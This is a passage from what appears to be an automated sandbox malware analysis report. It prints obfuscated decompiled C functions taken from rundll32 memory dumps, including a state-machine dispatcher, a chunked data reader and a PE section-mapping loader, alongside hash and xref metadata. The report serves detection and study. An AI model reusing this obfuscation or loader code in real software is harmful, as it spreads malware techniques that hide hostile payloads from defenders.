				_v120 = _v120 << 0xa;
				_v120 = _v120 | 0xcc2e0fa7;
				_v120 = _v120 ^ 0xcd2fcc20;
				_v160 = 0xf125;
				_v160 = _v160 | 0x7ac202f8;
				_v160 = _v160 << 9;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xff40056a;
				_v168 = 0x6f11;
				_v168 = _v168 * 0x26;
				_v168 = _v168 >> 5;
				_v168 = _v168 + 0xffff1ec9;
				_v168 = _v168 ^ 0xffffabe9;
				_v136 = 0x750;
				_v136 = _v136 ^ 0x499ec156;
				_t410 = 0x2c;
				_v136 = _v136 / _t410;
				_v136 = _v136 ^ 0x01ac6e57;
				_v164 = 0xde1f;
				_v164 = _v164 ^ 0x9a2c0c2f;
				_v164 = _v164 ^ 0xfc2f145b;
				_t463 = 0x60;
				_v164 = _v164 / _t463;
				_v164 = _v164 ^ 0x01104128;
				_v92 = 0x3401;
				_v92 = _v92 + 0xfffffc2d;
				_v92 = _v92 ^ 0x00002a73;
				_v188 = 0x45d7;
				_t411 = 0x13;
				_v188 = _v188 * 0x21;
				_v188 = _v188 * 0x1d;
				_v188 = _v188 * 0x48;
				_v188 = _v188 ^ 0x496dbef5;
				_v72 = 0x3e06;
				_v72 = _v72 / _t411;
				_v72 = _v72 ^ 0x000062d8;
				_v80 = 0xd8ef;
				_v80 = _v80 + 0xffffbf53;
				_v80 = _v80 ^ 0x0000c5f4;
				_v88 = 0x5fbd;
				_v88 = _v88 | 0x60cc2402;
				_v88 = _v88 ^ 0x60cc7a75;
				_v132 = 0xf2b5;
				_v132 = _v132 << 8;
				_v132 = _v132 / _t463;
				_v132 = _v132 ^ 0x00028738;
				goto L1;
				do {
					while(1) {
						L1:
						_t469 = _t414 - 0x1739e244;
						if(_t469 > 0) {
							break;
						}
						if(_t469 == 0) {
							E0020F3E9(_v156, _v64, _v172, _t461,  &_v52);
							_t466 =  &(_t466[3]);
							_t414 = 0x28f53702;
							continue;
						} else {
							if(_t414 == 0x9fb2af) {
								E001FCD04(_v108,  *((intOrPtr*)(_t462 + 0x14)), _v116,  &_v52, _v76);
								_t466 =  &(_t466[3]);
								_t414 = 0x25cb38c6;
								continue;
							} else {
								if(_t414 == 0x3f50d67) {
									_t414 = 0xe8afa1d;
									 *_t461 =  *_t461 & 0x00000000;
									_t461[1] = _v132;
									continue;
								} else {
									if(_t414 == 0x65a472b) {
										E001FCD04(_v148,  *((intOrPtr*)(_t462 + 0x10)), _v100,  &_v52, _v180);
										_t466 =  &(_t466[3]);
										_t414 = 0x9fb2af;
										continue;
									} else {
										if(_t414 == 0x966e996) {
											E001FCD04(_v72,  *((intOrPtr*)(_t462 + 0x28)), _v80,  &_v52, _v88);
										} else {
											if(_t414 == 0xe8afa1d) {
												_t461[1] = E00205DAA(_t462);
												_t414 = 0x35acaa76;
												continue;
											} else {
												_t475 = _t414 - 0x16696929;
												if(_t414 != 0x16696929) {
													goto L26;
												} else {
													E00208582(_v136, _t462 + 0x20, _t475, _v164,  &_v52, _v92, _v188);
													_t466 =  &(_t466[4]);
													_t414 = 0x966e996;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags =  *_t461;
						_t340 =  *_t461 != 0;
						__eflags = _t340;
						return 0 | _t340;
					}
					__eflags = _t414 - 0x1b4d4176;
					if(_t414 == 0x1b4d4176) {
						E001FCD04(_v96,  *((intOrPtr*)(_t462 + 0xc)), _v144,  &_v52, _v104);
						_t466 =  &(_t466[3]);
						_t414 = 0x65a472b;
						goto L26;
					} else {
						__eflags = _t414 - 0x25c5cce0;
						if(_t414 == 0x25c5cce0) {
							E001FCD04(_v68,  *((intOrPtr*)(_t462 + 8)), _v84,  &_v52, _v152);
							_t466 =  &(_t466[3]);
							_t414 = 0x1b4d4176;
							goto L1;
						} else {
							__eflags = _t414 - 0x25cb38c6;
							if(__eflags == 0) {
								E00208582(_v112, _t462 + 0x18, __eflags, _v120,  &_v52, _v160, _v168);
								_t466 =  &(_t466[4]);
								_t414 = 0x16696929;
								goto L1;
							} else {
								__eflags = _t414 - 0x28f53702;
								if(__eflags == 0) {
									E00208582(_v128, _t462, __eflags, _v140,  &_v52, _v176, _v184);
									_t466 =  &(_t466[4]);
									_t414 = 0x25c5cce0;
									goto L1;
								} else {
									__eflags = _t414 - 0x35acaa76;
									if(_t414 != 0x35acaa76) {
										goto L26;
									} else {
										_push(_t414);
										_t402 = E002057E8(_t461[1]);
										 *_t461 = _t402;
										__eflags = _t402;
										if(__eflags != 0) {
											_t414 = 0x1739e244;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L29;
					L26:
					__eflags = _t414 - 0xa1cf13b;
				} while (__eflags != 0);
				goto L29;
			}

0x0020469d
0x002046a4
0x002046ab
0x002046ad
0x002046af
0x002046b0
0x002046b5
0x002046bd
0x002046c0
0x002046cd
0x002046d5
0x002046da
0x002046e2
0x002046ed
0x002046f2
0x002046f8
0x00204700
0x00204708
0x00204710
0x00204715
0x0020471d
0x00204725
0x0020472a
0x00204733
0x00204738
0x0020473e
0x00204746
0x00204751
0x00204759
0x00204764
0x0020476c
0x00204774
0x00204779
0x00204781
0x00204789
0x00204791
0x0020479b
0x0020479c
0x002047a0
0x002047a8
0x002047b0
0x002047b5
0x002047bd
0x002047c5
0x002047cd
0x002047d5
0x002047e0
0x002047e4
0x002047ec
0x002047f9
0x002047fd
0x0020480a
0x0020480e
0x00204816
0x00204821
0x0020482c
0x00204837
0x0020483f
0x00204847
0x0020484f
0x0020485c
0x00204868
0x0020486d
0x00204871
0x00204875
0x0020487d
0x0020488d
0x00204893
0x0020489b
0x002048a3
0x002048ab
0x002048b8
0x002048bb
0x002048bf
0x002048c7
0x002048cf
0x002048d7
0x002048df
0x002048ec
0x002048f8
0x002048fc
0x00204904
0x0020490c
0x00204914
0x0020491c
0x00204924
0x0020492c
0x00204934
0x0020493c
0x00204941
0x00204949
0x00204956
0x00204959
0x0020495d
0x00204965
0x00204975
0x00204979
0x00204981
0x00204989
0x0020499b
0x0020499e
0x002049a5
0x002049b0
0x002049b8
0x002049c0
0x002049c8
0x002049d0
0x002049d8
0x002049dd
0x002049e5
0x002049ed
0x002049f5
0x002049fd
0x00204a02
0x00204a07
0x00204a0f
0x00204a1c
0x00204a20
0x00204a25
0x00204a2f
0x00204a37
0x00204a3f
0x00204a4d
0x00204a52
0x00204a56
0x00204a5e
0x00204a66
0x00204a6e
0x00204a7c
0x00204a81
0x00204a85
0x00204a8d
0x00204a95
0x00204a9d
0x00204aa5
0x00204ab4
0x00204ab5
0x00204abe
0x00204ac7
0x00204acb
0x00204ad3
0x00204aee
0x00204af5
0x00204b00
0x00204b0b
0x00204b16
0x00204b21
0x00204b29
0x00204b31
0x00204b39
0x00204b41
0x00204b51
0x00204b55
0x00204b55
0x00204b5d
0x00204b5d
0x00204b5d
0x00204b5d
0x00204b5f
0x00000000
0x00000000
0x00204b65
0x00204c63
0x00204c68
0x00204c6b
0x00000000
0x00204b6b
0x00204b71
0x00204c39
0x00204c3e
0x00204c41
0x00000000
0x00204b77
0x00204b7d
0x00204c12
0x00204c14
0x00204c17
0x00000000
0x00204b83
0x00204b89
0x00204bfc
0x00204c01
0x00204c04
0x00000000
0x00204b8b
0x00204b91
0x00204da3
0x00204b97
0x00204b99
0x00204bd8
0x00204bdb
0x00000000
0x00204b9b
0x00204b9b
0x00204ba1
0x00000000
0x00204ba7
0x00204bc2
0x00204bc7
0x00204bca
0x00000000
0x00204bca
0x00204ba1
0x00204b99
0x00204b91
0x00204b89
0x00204b7d
0x00204b71
0x00204dab
0x00204dad
0x00204db2
0x00204db2
0x00204dbc
0x00204dbc
0x00204c75
0x00204c7b
0x00204d6b
0x00204d70
0x00204d73
0x00000000
0x00204c81
0x00204c81
0x00204c87
0x00204d42
0x00204d47
0x00204d4a
0x00000000
0x00204c8d
0x00204c8d
0x00204c93
0x00204d13
0x00204d18
0x00204d1b
0x00000000
0x00204c95
0x00204c95
0x00204c9b
0x00204ce6
0x00204ceb
0x00204cee
0x00000000
0x00204c9d
0x00204c9d
0x00204ca3
0x00000000
0x00204ca9
0x00204cb1
0x00204cb5
0x00204cba
0x00204cbd
0x00204cbf
0x00204cc5
0x00000000
0x00204cc5
0x00204cbf
0x00204ca3
0x00204c9b
0x00204c93
0x00204c87
0x00000000
0x00204d78
0x00204d78
0x00204d78
0x00000000

Strings

@d, xrefs: 002048CF
Ro, xrefs: 0020487D
', xrefs: 0020473E
s*, xrefs: 00204A9D
[, xrefs: 0020484F
4N, xrefs: 00204981

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$4N$@d$Ro$[$s*
API String ID: 0-3977818246
Opcode ID: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
Instruction ID: 01481715aa9375e0ed0cf6d76ef904e4d502f2a0f7caf8f37342fa0fbca15844
Opcode Fuzzy Hash: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
Instruction Fuzzy Hash: 9A0235B15083818FE364CF24C489A1FFBE2BBD5348F508A1DF29A862A0D7759959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A3C07, Relevance: 7.9, Strings: 6, Instructions: 366COMMON

Download Yara Rule

Strings

[, xrefs: 002A3DC3
@d, xrefs: 002A3E43
4N, xrefs: 002A3EF5
Ro, xrefs: 002A3DF1
s*, xrefs: 002A4011
', xrefs: 002A3CB2

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$4N$@d$Ro$[$s*
API String ID: 0-3977818246
Opcode ID: 7beb517b66c4fe3d1a2266727905c4c05d8db11ad945927f9cffacd55e484f09
Instruction ID: dabf08b1069161a7953bfa351c0f1453949872c6800542c3cb9e6466d30ac16f
Opcode Fuzzy Hash: 7beb517b66c4fe3d1a2266727905c4c05d8db11ad945927f9cffacd55e484f09
Instruction Fuzzy Hash: E80244715083818FE728CF24C489A1BFBE2FBD5344F508A1DF29A86260DBB59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020676B, Relevance: 7.7, Strings: 6, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0020676B(intOrPtr __ecx, intOrPtr* __edx) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _t209;
				intOrPtr* _t214;
				intOrPtr _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				signed int _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t254;
				void* _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				signed int* _t260;

				_t222 = __ecx;
				_t260 =  &_v120;
				_v16 = 0x866cc;
				_v24 = __edx;
				asm("stosd");
				_v36 = _v36 & 0x00000000;
				_t256 = 0x32e15263;
				_v40 = __ecx;
				asm("stosd");
				asm("stosd");
				_v88 = 0x4c86;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0x4743;
				_v88 = _v88 ^ 0x00006c64;
				_v56 = 0x7209;
				_t249 = 0x2f;
				_v56 = _v56 / _t249;
				_v56 = _v56 ^ 0x00004ba4;
				_v104 = 0x1d35;
				_v104 = _v104 ^ 0x1719f2b3;
				_t250 = 0x70;
				_v104 = _v104 / _t250;
				_v104 = _v104 ^ 0x0034fe7c;
				_v108 = 0x850d;
				_t251 = 0x4b;
				_v108 = _v108 / _t251;
				_v108 = _v108 + 0xffff881b;
				_v108 = _v108 ^ 0xffffc0d4;
				_v76 = 0x9106;
				_v76 = _v76 ^ 0x4d359ade;
				_v76 = _v76 ^ 0x4d353ffa;
				_v100 = 0x5c6a;
				_v100 = _v100 + 0xffffc429;
				_t252 = 0x47;
				_v100 = _v100 / _t252;
				_v100 = _v100 ^ 0x000075a2;
				_v120 = 0xfdde;
				_v120 = _v120 + 0xffff2d79;
				_v120 = _v120 << 8;
				_v120 = _v120 + 0x72a3;
				_v120 = _v120 ^ 0x002bcffe;
				_v68 = 0x65b6;
				_v68 = _v68 ^ 0xa03a7dbc;
				_v68 = _v68 ^ 0xa03a0006;
				_v72 = 0x17a;
				_v72 = _v72 | 0xe4ec8cce;
				_v72 = _v72 ^ 0xe4ecfb88;
				_v96 = 0x4e8;
				_v96 = _v96 + 0x12c;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00018935;
				_v60 = 0xff48;
				_v60 = _v60 | 0x2f82106f;
				_v60 = _v60 ^ 0x2f82b48b;
				_v64 = 0xb5da;
				_v64 = _v64 ^ 0xd090b991;
				_v64 = _v64 ^ 0xd0906a5c;
				_v116 = 0xf7aa;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 + 0x5870;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x000599f3;
				_v92 = 0xc80a;
				_t253 = 0x33;
				_t259 = _v24;
				_t221 = _v24;
				_v92 = _v92 * 0x56;
				_v92 = _v92 + 0x14d;
				_v92 = _v92 ^ 0x004333b4;
				_v112 = 0x930e;
				_v112 = _v112 >> 0xe;
				_t254 = _v20;
				_v112 = _v112 / _t253;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x00000167;
				_v48 = 0x7ef;
				_v48 = _v48 + 0x7f73;
				_v48 = _v48 ^ 0x00009a09;
				_v84 = 0x8c86;
				_v84 = _v84 * 0x14;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0x01070a49;
				_v52 = 0xdc0;
				_v52 = _v52 | 0x8738231d;
				_v52 = _v52 ^ 0x873814a6;
				_v44 = 0xb7c7;
				_v44 = _v44 | 0xf6a52020;
				_v44 = _v44 ^ 0xf6a5b7e7;
				L1:
				while(1) {
					do {
						while(_t256 != 0x43b6c7f) {
							if(_t256 == 0x2e16d409) {
								_t225 = E0020CD07(_t222, _v104, _v108, _t209,  &_v32, _v76, _t259);
								_t260 =  &(_t260[5]);
								_v36 = _t225;
								if(_t225 == 0) {
									_t257 = _v36;
									L20:
									E001F91CD(_v112, _v48, _v84, _t221, _v52);
								} else {
									_t227 = _v32;
									if(_t227 == 0) {
										goto L16;
									} else {
										_v80 = _v80 + _t227;
										_t259 = _t259 - _t227;
										if(_t259 != 0) {
											L10:
											_t209 = _v80;
											L11:
											_t222 = _v40;
											_t256 = 0x2e16d409;
											continue;
										} else {
											_t228 = _t254 + _t254;
											_push(_t228);
											_v28 = _t228;
											_t258 = E002057E8(_t228);
											if(_t258 == 0) {
												goto L16;
											} else {
												E001F9970(_v68, _t221, _v72, _t258, _t254, _v96);
												E001F91CD(_v60, _v64, _v116, _t221, _v92);
												_t259 = _t254;
												_t220 = _t258 + _t254;
												_t254 = _v28;
												_t260 =  &(_t260[7]);
												_v80 = _t220;
												_t221 = _t258;
												if(_t259 == 0) {
													goto L16;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t256 != 0x32e15263) {
									goto L15;
								} else {
									_t256 = 0x43b6c7f;
									continue;
								}
							}
							L18:
							return _t257;
						}
						_t254 = 0x10000;
						_push(_t222);
						_t209 = E002057E8(0x10000);
						_t221 = _t209;
						if(_t221 == 0) {
							_t222 = _v40;
							_t256 = 0x166bd62c;
							goto L15;
						} else {
							_v80 = _t209;
							_t259 = 0x10000;
							goto L11;
						}
						goto L18;
						L15:
						_t209 = _v80;
					} while (_t256 != 0x166bd62c);
					L16:
					_t257 = _v36;
					if(_t257 == 0) {
						goto L20;
					} else {
						_t214 = _v24;
						 *_t214 = _t221;
						 *((intOrPtr*)(_t214 + 4)) = _t254 - _t259;
					}
					goto L18;
				}
			}

0x0020676b
0x0020676b
0x0020676e
0x00206780
0x00206784
0x00206789
0x0020678e
0x00206793
0x00206797
0x00206798
0x00206799
0x002067a1
0x002067a6
0x002067ae
0x002067b6
0x002067c2
0x002067c7
0x002067cd
0x002067d5
0x002067dd
0x002067e9
0x002067ee
0x002067f4
0x002067fc
0x00206808
0x0020680d
0x00206813
0x0020681b
0x00206823
0x0020682b
0x00206833
0x0020683b
0x00206843
0x0020684f
0x00206852
0x00206856
0x0020685e
0x00206866
0x0020686e
0x00206873
0x0020687b
0x00206883
0x0020688b
0x00206893
0x0020689b
0x002068a3
0x002068ab
0x002068b3
0x002068bb
0x002068c8
0x002068cc
0x002068d4
0x002068dc
0x002068e4
0x002068ec
0x002068f4
0x002068fc
0x00206904
0x0020690c
0x00206911
0x00206919
0x00206920
0x00206928
0x00206937
0x00206938
0x0020693c
0x00206940
0x00206944
0x0020694c
0x00206954
0x0020695c
0x00206967
0x0020696b
0x00206974
0x00206978
0x00206980
0x00206988
0x00206990
0x00206998
0x002069a5
0x002069ae
0x002069b2
0x002069be
0x002069c6
0x002069ce
0x002069d6
0x002069de
0x002069e6
0x00000000
0x002069ee
0x002069ee
0x002069ee
0x00206a00
0x00206a2d
0x00206a2f
0x00206a32
0x00206a38
0x00206b22
0x00206b26
0x00206b37
0x00206a3e
0x00206a3e
0x00206a44
0x00000000
0x00206a4a
0x00206a4a
0x00206a4e
0x00206a50
0x00206ab6
0x00206ab6
0x00206aba
0x00206aba
0x00206abe
0x00000000
0x00206a52
0x00206a56
0x00206a5d
0x00206a5e
0x00206a67
0x00206a6c
0x00000000
0x00206a72
0x00206a82
0x00206a98
0x00206a9d
0x00206a9f
0x00206aa2
0x00206aa9
0x00206aac
0x00206ab0
0x00206ab4
0x00000000
0x00000000
0x00000000
0x00000000
0x00206ab4
0x00206a6c
0x00206a50
0x00206a44
0x00206a02
0x00206a08
0x00000000
0x00206a0e
0x00206a0e
0x00000000
0x00206a0e
0x00206a08
0x00206b19
0x00206b21
0x00206b21
0x00206acc
0x00206ad5
0x00206ad8
0x00206add
0x00206ae2
0x00206aec
0x00206af0
0x00000000
0x00206ae4
0x00206ae4
0x00206ae8
0x00000000
0x00206ae8
0x00000000
0x00206af5
0x00206af5
0x00206af9
0x00206b05
0x00206b05
0x00206b0b
0x00000000
0x00206b0d
0x00206b0d
0x00206b13
0x00206b15
0x00206b15
0x00000000
0x00206b0b

Strings

cR2, xrefs: 00206A02
dl, xrefs: 002067AE
pX, xrefs: 00206911
cR2, xrefs: 0020678E
r, xrefs: 002067B6
j\, xrefs: 0020683B

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: r$cR2$cR2$dl$j\$pX
API String ID: 0-1990883307
Opcode ID: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
Instruction ID: ed085d45308619659719ffa771233ed99b19e63eb03749b89f057f285004c05a
Opcode Fuzzy Hash: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
Instruction Fuzzy Hash: F3A131B19093819BD314CF25C58981BFBE1FBC8758F144A2DF595AA2A0C3B5DA19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002A5CDF, Relevance: 7.7, Strings: 6, Instructions: 223COMMON

Download Yara Rule

Strings

cR2, xrefs: 002A5F76
cR2, xrefs: 002A5D02
pX, xrefs: 002A5E85
dl, xrefs: 002A5D22
r, xrefs: 002A5D2A
j\, xrefs: 002A5DAF

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: r$cR2$cR2$dl$j\$pX
API String ID: 0-1990883307
Opcode ID: 232f6b9b4bc80dec55373cbd827a23e62c4bced93fb9185d926dd279491af26e
Instruction ID: 16a59aae75178ac06d6eef5790304e743144b2e37e4af8bd98d9879bc3fd3907
Opcode Fuzzy Hash: 232f6b9b4bc80dec55373cbd827a23e62c4bced93fb9185d926dd279491af26e
Instruction Fuzzy Hash: CEA15E72909381CBD318CF25C58581BFBE1FBC9758F144A2DF59996260C7B9DA48CF82

Uniqueness

Uniqueness Score: -1.00%

Function 001F5BE1, Relevance: 7.7, Strings: 6, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001F5BE1(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t161;
				void* _t180;
				void* _t190;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t227;
				void* _t232;
				intOrPtr* _t234;
				signed int* _t236;
				signed int* _t237;
				signed int* _t238;

				_push(_a8);
				_t234 = __edx;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t161);
				_v16 = 0x1b4e;
				_v16 = _v16 ^ 0xc2117ce7;
				_v16 = _v16 ^ 0xc21177a9;
				_v20 = 0x4ee4;
				_t194 = 0x69;
				_v20 = _v20 / _t194;
				_v20 = _v20 ^ 0x000020c0;
				_v28 = 0x719b;
				_v28 = _v28 + 0x9810;
				_v28 = _v28 ^ 0x00016243;
				_v36 = 0xcf79;
				_v36 = _v36 << 4;
				_v36 = _v36 + 0x818a;
				_v36 = _v36 ^ 0x000d705e;
				_v40 = 0x5a4d;
				_v40 = _v40 + 0x4c3f;
				_t195 = 0x28;
				_v40 = _v40 * 0x4c;
				_v40 = _v40 ^ 0x0031666b;
				_v64 = 0x8d9a;
				_v64 = _v64 / _t195;
				_t196 = 0x5f;
				_v64 = _v64 / _t196;
				_t197 = 0x63;
				_v64 = _v64 * 0x23;
				_v64 = _v64 ^ 0x000027a7;
				_v12 = 0x746d;
				_v12 = _v12 / _t197;
				_v12 = _v12 ^ 0x00006093;
				_v60 = 0x2db8;
				_v60 = _v60 | 0xa376fc52;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00a31548;
				_v24 = 0xbe89;
				_v24 = _v24 + 0xfffffabc;
				_v24 = _v24 ^ 0x0000f7c2;
				_v48 = 0x7924;
				_v48 = _v48 + 0x8930;
				_t198 = 0x7b;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xb;
				_v48 = _v48 ^ 0x06fc5745;
				_v52 = 0x6da;
				_v52 = _v52 / _t198;
				_v52 = _v52 >> 2;
				_v52 = _v52 + 0xffffc306;
				_v52 = _v52 ^ 0xffffa7a2;
				_v32 = 0xa776;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0x9264e448;
				_v32 = _v32 ^ 0x975f0f13;
				_v4 = 0x5f13;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00006c09;
				_v8 = 0xd9b4;
				_t199 = 0x7d;
				_v8 = _v8 / _t199;
				_v8 = _v8 ^ 0x00001d23;
				_v44 = 0xe400;
				_v44 = _v44 | 0xbfff2ffd;
				_t200 = 3;
				_v44 = _v44 / _t200;
				_v44 = _v44 ^ 0x3fffd239;
				_v56 = 0xf54;
				_v56 = _v56 + 0xffffced3;
				_v56 = _v56 + 0x8d94;
				_v56 = _v56 ^ 0xc5d6359f;
				_v56 = _v56 ^ 0xc5d65e64;
				_t180 = E001F73F9(_v28, _v36, _v40, _v64, __edx);
				_t190 = _t180;
				_t236 =  &(( &_v64)[7]);
				if(_t190 != 0) {
					_t227 = E001F204B(_v56, _v12,  *((intOrPtr*)(_t190 + 0x50)), _v20 | _v16, _v60, _v24);
					_t237 =  &(_t236[5]);
					if(_t227 == 0) {
						L6:
						return _t227;
					}
					E001F9970(_v48,  *_t234, _v52, _t227,  *((intOrPtr*)(_t190 + 0x54)), _v32);
					_t238 =  &(_t237[4]);
					_t232 = ( *(_t190 + 0x14) & 0x0000ffff) + 0x18 + _t190;
					_t192 = ( *(_t190 + 6) & 0x0000ffff) * 0x28 + _t232;
					while(_t232 < _t192) {
						_t188 =  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10));
						E001F9970(_v4,  *((intOrPtr*)(_t232 + 0x14)) +  *_t234, _v8,  *((intOrPtr*)(_t232 + 0xc)) + _t227,  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10)), _v44);
						_t238 =  &(_t238[4]);
						_t232 = _t232 + 0x28;
					}
					goto L6;
				}
				return _t180;
			}

0x001f5be6
0x001f5bea
0x001f5bec
0x001f5bee
0x001f5bef
0x001f5bf0
0x001f5bf5
0x001f5bff
0x001f5c07
0x001f5c0f
0x001f5c1d
0x001f5c22
0x001f5c28
0x001f5c30
0x001f5c38
0x001f5c40
0x001f5c48
0x001f5c50
0x001f5c55
0x001f5c5d
0x001f5c65
0x001f5c6d
0x001f5c7a
0x001f5c7d
0x001f5c81
0x001f5c89
0x001f5c99
0x001f5ca1
0x001f5ca6
0x001f5cb1
0x001f5cb4
0x001f5cb8
0x001f5cc0
0x001f5cd0
0x001f5cd4
0x001f5cdc
0x001f5ce4
0x001f5cec
0x001f5cf1
0x001f5cf9
0x001f5d01
0x001f5d09
0x001f5d11
0x001f5d19
0x001f5d26
0x001f5d27
0x001f5d2b
0x001f5d30
0x001f5d38
0x001f5d46
0x001f5d4a
0x001f5d4f
0x001f5d57
0x001f5d5f
0x001f5d67
0x001f5d6c
0x001f5d74
0x001f5d7e
0x001f5d86
0x001f5d8b
0x001f5d93
0x001f5da1
0x001f5da6
0x001f5dac
0x001f5db4
0x001f5dbc
0x001f5dc8
0x001f5dcc
0x001f5dd0
0x001f5dd8
0x001f5de0
0x001f5de8
0x001f5df0
0x001f5df8
0x001f5e10
0x001f5e15
0x001f5e17
0x001f5e1c
0x001f5e44
0x001f5e46
0x001f5e4b
0x001f5eb0
0x00000000
0x001f5eb2
0x001f5e61
0x001f5e6a
0x001f5e74
0x001f5e79
0x001f5eab
0x001f5e92
0x001f5ea0
0x001f5ea5
0x001f5ea8
0x001f5ea8
0x00000000
0x001f5eaf
0x001f5eb8

Strings

mt, xrefs: 001F5CC0
kf1, xrefs: 001F5C81
N, xrefs: 001F5C0F
$y, xrefs: 001F5D11
l, xrefs: 001F5D8B
^p, xrefs: 001F5C5D

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: l$$y$^p$kf1$mt$N
API String ID: 0-2826323611
Opcode ID: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
Instruction ID: 8d0a29df5263d5cf61a8bf80993960b44bd5b05b8bc1a8af296fb4f6064b6450
Opcode Fuzzy Hash: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
Instruction Fuzzy Hash: 19712371509340ABE354CF65C98991BFBF2BBC4718F008A1DF6898A2A1D7B6D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00295155, Relevance: 7.7, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

N, xrefs: 00295183
$y, xrefs: 00295285
mt, xrefs: 00295234
kf1, xrefs: 002951F5
l, xrefs: 002952FF
^p, xrefs: 002951D1

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: l$$y$^p$kf1$mt$N
API String ID: 0-2826323611
Opcode ID: 78f038dc0e4ef9929ec4f741ff8329dea4f98121d34733f8e58f2be97767d7ee
Instruction ID: 0f31e3de605e1609ac9a774e927ca599a193b339cfd3aa398010df5e7bb3fe30
Opcode Fuzzy Hash: 78f038dc0e4ef9929ec4f741ff8329dea4f98121d34733f8e58f2be97767d7ee
Instruction Fuzzy Hash: C47143716083409FE354CF65C98991BBBF2FBC8708F008A1DF5898A2A0D7B6D9598F02

Uniqueness

Uniqueness Score: -1.00%

Function 001F5856, Relevance: 7.7, Strings: 6, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

